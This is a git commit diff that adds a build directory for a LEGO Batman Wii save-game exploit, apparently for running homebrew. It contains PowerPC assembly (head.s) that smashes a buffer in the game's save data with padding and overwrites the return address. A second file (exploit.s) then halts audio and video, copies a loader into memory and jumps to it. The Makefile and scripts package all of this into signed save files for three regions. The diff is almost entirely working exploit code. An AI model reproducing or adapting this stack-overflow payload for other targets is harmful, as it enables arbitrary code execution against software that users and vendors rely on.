LEGO Batman^H^H^Hhaxx

2011-01-02 06:46:51 +01:00 · 2011-01-02 06:46:51 +01:00 · da886e2a72
parent 4d980dfebb
commit da886e2a72
21 changed files with 250 additions and 0 deletions
--- a/2
+++ b/2
@ -52,6 +52,7 @@ all: FORCE .version
 	$(Q)$(MAKE) -C loader
 	$(Q)$(MAKE) -C twilight
 	$(Q)$(MAKE) -C lego
+	$(Q)$(MAKE) -C batman

 FORCE:

@ -60,3 +61,4 @@ clean:
 	$(MAKE) -C loader clean
 	$(MAKE) -C twilight clean
 	$(MAKE) -C lego clean
+	$(MAKE) -C batman clean
--- a/batman/.gitignore
+++ b/batman/.gitignore
@ -0,0 +1 @@
+FILE_V28
--- a/batman/Makefile
+++ b/batman/Makefile
@ -0,0 +1,116 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= broadway-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+	CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+	LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+	Q :=
+else
+	Q := @
+	MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := rlbp.bin rlbj.bin rlbe.bin
+
+ppms := $(targets:%.bin=%-icon.ppm) rlb-banner.ppm
+assets := title.bin $(ppms)
+
+loader := ../loader/loader.bin
+
+
+titleid = $(shell perl titleid.pl $(1))
+
+
+define twintig
+	D=$(call titleid,$(1));				\
+	$(TOOLS)/twintig $$D $@ toc-$1
+endef
+
+
+all: $(targets)
+
+$(targets): %.bin: toc-% FILE_V28 $(assets)
+	@echo "  TWINTIG   $@"
+	$(Q)$(call twintig,$*)
+
+FILE_V28: head.bin exploit.bin $(loader)
+	@echo "  LEGOSTACK $@"
+	$(Q)./pack.sh $@ $^
+	$(Q)$(TOOLS)/lego-cksum $@
+
+head.bin: head.elf
+	@echo "  OBJCOPY   $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.bin: exploit.elf
+	@echo "  OBJCOPY   $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.elf: lego.lds exploit.o
+	@echo "  LINK      $@"
+	$(Q)$(LD) -T $^ -o $@
+
+head.elf: head.o
+	@echo "  LINK      $@"
+	$(Q)$(LD) -e 0 $< -o $@
+
+exploit.o: exploit.s
+	@echo "  ASSEMBLE  $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+head.o: head.s head.b
+	@echo "  ASSEMBLE  $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+title.bin: ../.version
+	@echo "  TITLEBIN  $@"
+	$(Q)perl make-title-bin.pl > $@
+
+../.version: FORCE
+	$(Q)$(MAKE) -C .. .version
+
+$(ppms): %.ppm: %.png
+	@echo "  PPM       $@"
+	$(Q)convert $< $@
+
+$(loader): FORCE
+	$(Q)$(MAKE) -C ../loader
+
+FORCE:
+
+clean:
+	-rm -f $(targets) FILE_V28
+	-rm -f exploit.bin exploit.elf exploit.o
+	-rm -f head.bin head.elf head.o
+	-rm -f title.bin
--- a/batman/exploit.s
+++ b/batman/exploit.s
@ -0,0 +1,45 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# Copyright      2011  Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	.section .start,"ax"
+	retadr = 0x90394140
+
+	# The return addr for the nintendo loader is a bit different as for 3rd
+	# party loaders. In fact, it depends which value is set by the apploader at
+	# 0x8000002c:
+	#  -  0x0: return address is 0x90394140 (some 3rd party loader, e.g. gecko os)
+	#  - 0x23: return address is 0x90394000 (set by the sysmenu loader by nintendo)
+	#  0B ver:                   0x90394100
+	# to make both work, we insert some no op's here
+	.fill (0x140/0x4), 4, 0x60000000
+
+start:
+	# Set up a stack frame.
+	lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+	# Stop audio and video.
+	lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
+	lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
+
+	# Move code into place; a generous 32kB, starting at 64kB in
+	# the save file.
+
+	lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+	lis 4,(retadr-4)@h ; ori 4,4,(retadr-4)@l
+	# Calculate proper offset for the loader in memory
+0:	lbzu 0,4(4); cmpwi 0,0x60 ; beq 0b
+	addi 4,4,-4; addi 4,4,end-start
+
+	li 0,0x2000 ; mtctr 0
+0:	lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
+
+	# Sync caches on it.
+	li 0,0x0400 ; mtctr 0 ; mr 5,3
+0:	dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
+	sync ; isync
+
+	# Go for it!
+	mtctr 3 ; bctr
+end:
--- a/batman/head.b
+++ b/batman/head.b
--- a/batman/head.s
+++ b/batman/head.s
@ -0,0 +1,31 @@
+# Copyright      2011  Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	retadr = 0x90394140
+0:
+	# stolen from some savegame found in teh intertube
+	.incbin "head.b"
+
+	# give the char a name
+	.ascii "you won't see this  " # len = 0x14
+
+	# smash it \o/ 0x1f0+0x4 bytes all in all...
+	.fill (0xf4/4), 4, 0x11111111
+
+	# unlock the character (somewhere here actually...)
+	.fill (0x10/4), 4, 0x90c10104
+
+	# add more padding...
+	.fill (0xdc/4), 4, 0x11111111
+
+	# now we at the actual vuln return address
+	# just point to the loader of the loader (= content of exploit.s)
+	.long retadr
+
+	# alternatively you can put the code here too and jump into the stack,
+	# however then you have to take care for nullbytes in the resulting
+	# bytecode, which is a way too tedious. so we just take the further slot for
+	# it :-) (LEGO devs are nice ppl, heh)
+
+	.fill 0x10000 - (. - 0b)
--- a/batman/lego.lds
+++ b/batman/lego.lds
@ -0,0 +1,22 @@
+/* Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+   This code is licensed to you under the terms of the GNU GPL, version 2;
+   see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt  */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+	audio_stop = 0x8009cfa0;
+	video_stop = 0x800ab190;
+
+	main = 0x90000020;
+
+	.twilight 0x90394000:
+	{
+		rlb*.o(.start)
+		*(.text)
+		*(.rodata .rodata.*)
+		*(.data)
+		*(.bss)
+	}
+}
--- a/batman/make-title-bin.pl
+++ b/batman/make-title-bin.pl
@ -0,0 +1,16 @@
+#!/usr/bin/perl
+sub printline {
+	my $x = shift;
+	chomp $x;
+	$x .= "\0" x 32;
+	$x = substr $x, 0, 32;
+	$x =~ s/(.)/\0$1/g;
+
+	print $x;
+}
+
+$name = '"Bathaxx" by lewurm';
+$version = `cat ../.version`;
+
+printline $name;
+printline $version;
--- a/batman/pack.sh
+++ b/batman/pack.sh
@ -0,0 +1,3 @@
+#!/bin/bash
+TARGET=$1; shift
+cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET
--- a/batman/rlb-banner.png
+++ b/batman/rlb-banner.png
--- a/batman/rlb-banner.ppm
+++ b/batman/rlb-banner.ppm
--- a/batman/rlbe-icon.png
+++ b/batman/rlbe-icon.png
--- a/batman/rlbe-icon.ppm
+++ b/batman/rlbe-icon.ppm
--- a/batman/rlbj-icon.png
+++ b/batman/rlbj-icon.png
--- a/batman/rlbj-icon.ppm
+++ b/batman/rlbj-icon.ppm
--- a/batman/rlbp-icon.png
+++ b/batman/rlbp-icon.png
--- a/batman/rlbp-icon.ppm
+++ b/batman/rlbp-icon.ppm
--- a/batman/titleid.pl
+++ b/batman/titleid.pl
@ -0,0 +1,2 @@
+#!/usr/bin/perl
+print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];
--- a/batman/toc-rlbe
+++ b/batman/toc-rlbe
@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbe-icon.ppm
+FILE_V28 FILE_V28
--- a/batman/toc-rlbj
+++ b/batman/toc-rlbj
@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbj-icon.ppm
+FILE_V28 FILE_V28
--- a/batman/toc-rlbp
+++ b/batman/toc-rlbp
@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbp-icon.ppm
+FILE_V28 FILE_V28